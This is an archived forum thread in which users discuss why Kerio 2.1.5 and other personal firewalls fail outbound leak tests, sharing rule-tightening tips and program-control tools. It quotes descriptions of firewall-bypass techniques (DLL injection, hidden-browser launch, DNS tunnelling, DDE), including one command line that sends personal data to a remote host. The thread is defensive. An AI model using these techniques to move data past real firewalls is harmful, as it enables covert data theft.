Kerio 2.1.5 Vulnerabilities!!

[jo]

Investigate system safety monitor,

This looks interesting. I will give it a try.

http://maxcomputing.narod.ru/ssme.html?lang=en

abtrusioner protector

NT, 2K, XP only

http://www.abtrusion.com/

or proccessguard
(free).

Freeware version limited to protecting a single app, AKA absolute
crippleware

http://www.diamondcs.com.au/processguard/index.php?page=download

 

[REM]

The "problem" for a trojan would be to find out which applications are
allowed to "go out".

I think John hit it on the head. Closing all access is about the only way to
prevent them and that's not much fun. Some of these sample programs were able to
get out with almost nothing allowed to connect in Kerio.

I do not think that all of these piggyback out on other apps. Some simply bypass
the firewall somehow. I'm going to do a bit more reading up on it.

And to sum it better, this is not really a Kerio problem as I placed in the
subject. It seems to apply to many firewalls.

 

[REM]

This looks interesting. I will give it a try.

NT, 2K, XP only

Freeware version limited to protecting a single app, AKA absolute
crippleware

http://www.diamondcs.com.au/processguard/index.php?page=download

Thanks Jo and Aaron.

I'm trying the links now.

 

[jo]

And to sum it better, this is not really a Kerio problem as I placed in the
subject. It seems to apply to many firewalls.

Yep.

Part of the point here is that FW's are not bullet proof; some FW's are
trying to implement app protection as a result of the fuss over some of
these leak tests, but someone will always find a way round...

There is an interesting buyware FW called Look'n'Stop that has excellent
app control and passes all leak tests with minimal tweaking. I would
still be using it if it was properly configurable :-(

 

[Joe P]

One more thing to do, tighten your existing rules.

For example, make sure your email program is only allowed to connect
to your ISP's specific IP address or mailserver name. I personally
don't allow any smtp/pop traffic because I don't mind responding to
the pop up.

I only allow DNS requests to the 2 specific addresses my ISP uses.
Internet Explorer is only allowed to connect to the localhost on the
specific port Proxomitron listens on so IE can't access the Internet
unless I start Proxomitron first.

After using the advice at blackviper to close all possible ports, then
revisit or rebuild your rules.

I still use Kerio 2.1.5 and have been using software firewalls since
Atguard 2.0 . I'm behind a router and have the minimum services
running but I still like Kerio.

Joe P

 

[John Corliss]

I think John hit it on the head. Closing all access is about the only way to
prevent them and that's not much fun. Some of these sample programs were able to
get out with almost nothing allowed to connect in Kerio.

If you use the "deny all" rule, make sure it's the last in the list.
When Kerio 2.1.5 adds a new rule, it puts it at the bottom, even below
the "Deny all" rule. You need to move it above the "Deny all rule."

 

[Kerodo]

This looks interesting. I will give it a try.

http://maxcomputing.narod.ru/ssme.html?lang=en

SSM is pretty good. There's supposed to be a new version released
sometime in August last I heard..

 

[Kerodo]

One more thing to do, tighten your existing rules.


I only allow DNS requests to the 2 specific addresses my ISP uses.

Also specify Services.Exe (Win2k) as the app in your DNS rule, or
Svchost.Exe if you use XP. That tightens it up a little more.

 

[Chaos Master]

It was written by REM[[email protected]] in message

That's true and I started to write that, but I didn't. If you have kids using
the PC as I do you never know what they might install, intentionally, tricked,
or trojaned. So, it seems important that the system be able to handle as many
exploits as possible. Kerio, unfortunately, scores pretty low in comparison to
other firewalls, some of which are commercial.

I am the only user of the PC.

One quick fix I read about, setup IE in Kerio and explicity deny! That's just

I block *all* incoming connections except for mIRC on the 1024-5000 ports (file
sending).

 

[Chrissy Cruiser]

. I'm behind a router and have the minimum services
running but I still like Kerio.

So am I. What do you think your router provides/protects you in this case?

 

[Steve H]

(e-mail address removed) ( Steve H) wrote in


In general no, MD 5 signatures only work, if some software renamed itself
to have the same name as a trusted app, but it would then have a different
MD5 hash. This was the original crude method used by the original leak test
by Steve Gibson.

But nowdays leak tests don't use such methods.

Process/DLL injection, misuse of hardcorded rules,"piggybacking" on trusted
apps, exploiting weaknesses in the filtering by a lower level transmission
etc are some of the methods used these days.

Read the leakpaper document here
http://www.firewallleaktester.com/docs/leaktest.pdf

So in other words - none of the buggers work...if compromised.

Ah well, what can ya do?
I run proxomitron, scriptstop, plus a number of other tweaks etc and
some pretty harsh settings for the browser..along with apps that have
some robustness ( Pegasus etc ) - but ultimately I keep a ghost
archive of the OS and data drives as a fallback.

I must be doing something right - the only exploit I've ever had was a
virus.. and that was down to my own stupidity ( yeah, I clicked on the
pif to see what would happen! ).

From what's been said here it seems that by far the best protection is
not to allow any exploits on the system in the first place..once
they're there, it's all over bar the shouting.

Regards,

 

[scroob]

I've just merged a reg labled as SAFE from the Black Viper site. I'm
going to run the exploits again and see if Windows was the real
culprit. I've fully trusted Kerio 2.1.5 for so long it's going to hurt
if it does fail again.

But you are running a very unsafe OS (XP) with a firewall that was never
designed to run on it. The first thing I would do is trash XP. I'm
considering buying a new computer, and I have made that decision. XP will
bite the dust on first bootup.

Oxymoron = XP security.

 

[REM]

But you are running a very unsafe OS (XP) with a firewall that was never
designed to run on it. The first thing I would do is trash XP. I'm
considering buying a new computer, and I have made that decision. XP will
bite the dust on first bootup.

Oxymoron = XP security.

It seems like there are more ways to exploit XP than there was with 98SE. I
wonder if it's because more people are trying, or if XP just has more security
issues?

 

[REM]

It was written by REM[[email protected]] in message
That's true and I started to write that, but I didn't. If you have kids using
the PC as I do you never know what they might install, intentionally, tricked,
or trojaned. So, it seems important that the system be able to handle as many
exploits as possible. Kerio, unfortunately, scores pretty low in comparison to
other firewalls, some of which are commercial.

I am the only user of the PC.

I block *all* incoming connections except for mIRC on the 1024-5000 ports (file
sending).

Kerio 2.1.5 works fine as far as blocking incoming threats goes. It's the trojan
outbound that it, and others fails miserably at, in XP at least.

 

[REM]

SSM is pretty good. There's supposed to be a new version released
sometime in August last I heard..

The version I got is 1.9.4, dated Dec. 1, 2003. I'm just now playing with it.

 

[REM]

So in other words - none of the buggers work...if compromised.

Some firewalls catch some of these simple exploits. None listed catch them all.

System Safety Monitor! This caught all of them dead in their tracks!

Ah well, what can ya do?

Check out System Safety Monitor:

http://maxcomputing.narod.ru/ssme.html?lang=en (535k dl.)

It does what I had "thought" Kerio and other firewalls did. It only allows the
programs that you give permission to run. While Kerio creates an MD5 checksum
for each application and has path verification there are simple ways to avoid
being caught.

-------------------------------------------------------------------------------------------

A couple of the demo programs fork child processes and closed the parent process
before execution. Unable to locate the parent PID most firewalls listed simply
let the child PID run. This is so incredibly easy to do codewise that it's hard
to believe the so many firewalls never thought to check for this.

Categories : timing attack:

"Generally, when an application access the Internet, firewall uses Windows API
to retrieve the parent PID and name (the executable which launch the trusted
application) and when they have it, they freeze it (suspend) and ask you what to
do (allow/deny).

To prevent to be seen, Ghost once it has given information to send to the
default browser, change of PID by shuting down itself and restarting itself to
continue to send data."

-------------------------------------------------------------------------------------------

This one simply launches a hidden browser window. Again, incredibly simple to
do. It sends nor receives data. It uses the browser to do this, as the browser
has firewall permissions set.

Kerio and XP firewalls are vulnerable.

Categories : launcher

"Tooleaky opens your default web browser with the following command line :

iexplore.exe http://grc.com/lt/leaktest.htm?PersonalInfoGoesHere

The launched window is hidden. If the web browser is allowed to access to port
80, all data will able to be transmitted to remote adress (in our case GRC.com).
Keep in mind that this information could be password or credit card number by a
real malicious program..."

-------------------------------------------------------------------------------------------

This one uses the previous method of launching a hidden browser window with a
bit more sophisticated trickery:

Categories : launcher, DLL injection

"FireHole uses default web browser to transmit data to a remote host.
To do this, it installs a DLL file (with interception function inside) on user's
computer.

After, this DLL loads itself to be in same process space than application aimed,
here a trusted one, so FireHole has great probability to access the Internet
stealthly.

Meaning :

If the test is a success, this means 2 things : your firewall doesn't control
applications that launch others, and is in addition vulnerable to DLL
injection."

-------------------------------------------------------------------------------------------

Categories: : recursive request

"By default on NT OSs since windows 2000, a Windows service 'DNS client' is
running and handles all DNS requests. Thus, all DNS requests coming from various
applications you can have will be transmitted to the DNS client (SVCHOST.EXE
under XP) which will, itself, do the DNS request.

This behaviour can be used to transmit data to a remote computer by crafting a
special DNS request without the firewalls notice it. Indeed, the DNS client
windows service must be allowed to acces the Internet. DNStester uses this kind
of DNS recursive request to bypass your firewall."

-------------------------------------------------------------------------------------------

A launcher with a simple twist. It uses an old protocol to avoid detection:

Categories: : launcher

"Many firewalls now catch the direct ShellExecute or CreateProcess while calling
Internet Explorer and giving it paramaters. To avoid that, Surfer creates a
hidden desktop and launch IE inside it with no url, so no network access. It
then launch another instance of itself, and close the first one. Then it use the
DDE protocol (Direct Data Exchange).

DDE is an old protocol for inter-process data exchange (very similar to OLE).
Netscape has developed a DDE interface for his browser and all major ones,
including IE.

The paramaters are so provided to IE via DDE, and not via a direct call while
launching it.

Meaning :

If the test is a success, this means that your firewall does not check for the
DDE inter-process protocol, or that his parent/child monitoring is not strong
enough.

Note that DDE could be used on an already running IE instance, and would just be
less stealth this way, but possible."

-------------------------------------------------------------------------------------------

I run proxomitron, scriptstop, plus a number of other tweaks etc and
some pretty harsh settings for the browser..along with apps that have
some robustness ( Pegasus etc ) - but ultimately I keep a ghost
archive of the OS and data drives as a fallback.

Your ghost archive is very good, along with the rest.

I must be doing something right - the only exploit I've ever had was a
virus.. and that was down to my own stupidity ( yeah, I clicked on the
pif to see what would happen! ).

I've been hit twice, possibly three times, and I have no clue as to how. I only
run Spywareblaster, Kerio 2.1.5 and had what I thought were good browser
settings. The actual XP services running did not affect these particular
exploits.

From what's been said here it seems that by far the best protection is
not to allow any exploits on the system in the first place..once
they're there, it's all over bar the shouting.

I am trying another program suggested, Abtrusioner Protector today:

NT, 2K, XP only

http://www.abtrusion.com/

It looks like System Safety Monitor alone catches these known and published
exploits by checking each executable before allowing it to run. As to what
unknown, unpublished, and possibly more sophisticated exploits go... ?

I feel much better with SSM right now though!

Thanks again Jo and Aaron for the valuable info. I had no idea that it was so
easy to end run a firewall.

 

[Aaron]

This looks interesting. I will give it a try.

http://maxcomputing.narod.ru/ssme.html?lang=en


NT, 2K, XP only

http://www.abtrusion.com/


Freeware version limited to protecting a single app, AKA absolute
crippleware

Not in this context. Yes, Proccessguard's primary purpose is to prevent a
process from being terminated and the freeware version guards only one
process besides itself .

But in this context I'm talking about the use of the "program checksum
mode" in it.

This can be set to prevent all but recognised and allowed programs from
running. Run it first in training mode, than lock it to prevent other apps
from running.

There are no restrictions for this function.

In additon, it can automatically block drivers,services from autostarting,
global hooks, etc which protects you from practically all keyloggers.

It is not totally worthless. Have you tried it?

 

[Aaron]

REM schreef:


The "problem" for a trojan would be to find out which applications are
allowed to "go out".

Indeed, everyone has a browser configured to go out. Some people are more
tricky and filter it through a local web proxy etc.

There are some talk about randomising process names, display elements on
the UI for firefox, etc to help make it harder to guess.....

 

[Aaron]

SSM is pretty good. There's supposed to be a new version released
sometime in August last I heard..

There is a beta test going on right now. Seems to be based on kernal mode
much like SSM, but if done wrongly can totally trash your system. I was not
crazy enough to try.

 

[Aaron]

Some firewalls catch some of these simple exploits. None listed catch
them all.

System Safety Monitor! This caught all of them dead in their tracks!


Check out System Safety Monitor:

http://maxcomputing.narod.ru/ssme.html?lang=en (535k dl.)

It does what I had "thought" Kerio and other firewalls did. It only
allows the programs that you give permission to run. While Kerio
creates an MD5 checksum for each application and has path verification
there are simple ways to avoid being caught.

Actually Kerio 4 does some of what SSM does. Not as well though.